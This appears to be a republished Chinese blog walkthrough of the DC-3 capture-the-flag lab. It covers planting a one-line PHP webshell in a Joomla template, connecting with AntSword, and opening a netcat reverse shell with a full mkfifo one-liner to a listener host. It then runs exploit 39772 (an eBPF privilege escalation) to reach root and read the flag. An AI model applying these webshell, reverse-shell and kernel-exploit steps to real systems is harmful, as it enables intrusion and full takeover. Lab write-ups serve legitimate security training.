HashMap 软件开发 智慧树 sockets tfs concurrency gulp EaselJS bootstrap后台管理系统模板 后台管理网页模板 nginx视频教程 web前端开发实战项目 electron安装 jq获取元素宽度 大数据项目开发案例 oracle无效的列索引 js键值对数组 idea中svn的使用 mysql查询结果拼接 python环境设置 配置python环境 python怎么配置环境 python编程工具 python创建文件 java基础教学 javasocket通信 java安装环境 javaif语句 java抽象方法 java中class sp5 vs2010sp1 atq 高效能人士的七个习惯下载 redis入门指南 js判断字符串相等 选择模拟位置信息应用 robotstudio 惠普战99 亚索刀光
当前位置: 首页 > 学习教程  > 编程语言

08DC3后续提权过程

2020/8/11 19:15:45 文章标签:

1.GetShell

寻找可以修改PHP文件的地方
Templates
在这里插入图片描述
Beez3 Details and Files
在这里插入图片描述
写入一句话木马
一句话木马
木马地址:

http://192.168.48.136/templates/beez3/html/yjh.php

在这里插入图片描述
用蚁剑连接
填写密码和地址
在这里插入图片描述

2.提权

反弹shell
攻击端监听端⼝等待回连

nc -lvvp 2333

在这里插入图片描述
靶机运行反弹shell命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.20 1234 >/tmp/f

在这里插入图片描述
建立连接
在这里插入图片描述
在这里插入图片描述

 unzip 39772.zip
 cd 39772
 tar xf exploit.tar
 cd ebpf_mapfd_doubleput_exploit
 ./compile.sh
 ./doubleput
 starting writev
 id
  cd /root
  cat the-flag.txt

在这里插入图片描述

在这里插入图片描述
看到flag,完成
我把39772文件传到我的资源了,看到可以免费下载。


本文链接: http://www.dtmao.cc/news_show_100105.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?